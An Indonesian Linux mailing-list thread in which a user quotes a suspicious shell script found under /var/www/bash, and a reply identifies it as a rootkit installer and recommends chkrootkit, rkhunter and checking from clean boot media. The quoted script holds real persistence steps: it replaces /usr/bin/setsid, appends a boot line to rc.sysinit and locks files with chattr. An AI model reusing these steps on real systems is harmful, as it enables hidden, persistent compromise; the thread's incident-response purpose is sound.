> halo,
>
> saya heran di linux saya ada folder /var/www/bash. di situ ada beberapa
> executable, dan ada file script namanya id, isinya:
>
> ------------------------
> #!/bin/sh
> echo " *** Welcome Kid *** "
> mkdir -p /var/www/bash ; mv /tmp/x /var/www/bash
> chattr -iau /sbin/init ; mv -f /sbin/init /sbin/hidden
> cd /var/www/bash/x ; ./inst >/dev/null 2&>1
> sleep 2
> cd /var/www/bash ; ./sk >/dev/null
> chattr -iau /sbin/init
> rm -rf /sbin/init ; mv -f /sbin/hidden /sbin/init
> echo " *** adding files for reboot ... *** "
> chattr -iau /usr/bin/setsid ; rm -rf /usr/bin/setsid
> sleep 2
> chattr -iau /var/www/bash/sk ; chattr -iau /etc/rc.d/rc.sysinit
> cp /var/www/bash/sk /usr/bin/setsid
> echo "/usr/bin/setsid >/dev/null 2&>1" >> /etc/rc.d/rc.sysinit
> chattr +iau /etc/rc.d/rc.sysinit ; echo "ftp" >> /etc/ftpusers
> echo "anonymous" >> /etc/ftpusers
> echo " Job with Sk = DONE "
> rm -rf /tmp/x gud.tgz ; cd /var/www/bash ; mkdir ah ; mv /tmp/x ah
> ---------------
>
> ini file apaan ya ?
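++
Hati-hati, kayaknya ada yang coba pasang rootkit tuh ... seringkali kalau sudah berhasil dia meninggalkan backdoor juga. Tandanya kelihatan di skrip itu: /sbin/init sempat dipindahkan lalu dikembalikan, /usr/bin/setsid dihapus dan diganti salinan berkas sk, /etc/rc.d/rc.sysinit ditambahi baris supaya berkas itu jalan lagi setiap boot lalu dikunci dengan chattr +iau, dan /etc/ftpusers ikut diubah.

Cek linux anda pakai chkrootkit http://www.chkrootkit.org/ dan rootkit hunter http://www.rootkit.nl/ . Karena utilitas di sistem yang sudah disusupi belum tentu bisa dipercaya, lebih aman menjalankan pemeriksaan dari media boot yang bersih.

moga belum parah

salam,
-rianu-

--
Unsubscribe: kirim email kosong ke [EMAIL PROTECTED]
Arsip, FAQ, dan info milis di http://linux.or.id/milis.php
Tidak bisa posting? Baca:
http://linux.or.id/wiki/index.php?pagename=ProblemMilisDanSolusi
http://linux.or.id/wiki/index.php?pagename=TataTertibMilis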
